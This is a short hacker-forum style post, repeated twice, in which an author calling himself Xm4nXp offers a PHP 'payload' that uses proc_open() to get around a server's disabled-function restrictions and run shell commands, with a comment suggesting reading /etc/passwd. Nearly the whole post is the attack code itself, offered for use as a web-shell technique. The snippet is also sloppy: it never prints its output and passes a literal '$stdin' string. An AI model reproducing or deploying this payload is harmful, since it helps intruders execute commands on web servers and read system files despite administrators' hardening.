hello guys, I'm back, it's been a long time haha
how to bypass disable function with proc_open()
By Xm4nXp
Payload : <?php
//Payload By Xm4nXp
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
// Change ls | ex : cat /etc/passwd
$process = proc_open("ls", $descriptorspec, $pipes, null, null);
fwrite($pipes[0], '$stdin');
fclose($pipes[0]);
$res = stream_get_contents($pipes[1]);
?>
Or link : wait for the next bypass

how to bypass disable function with proc_open()
By Xm4nXp
Payload : <?php
//Payload By Xm4nXp
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
// Change ls | ex : cat /etc/passwd
$process = proc_open("ls", $descriptorspec, $pipes, null, null);
fwrite($pipes[0], '$stdin');
fclose($pipes[0]);
$res = stream_get_contents($pipes[1]);
?>
Or link : wait for the next bypass
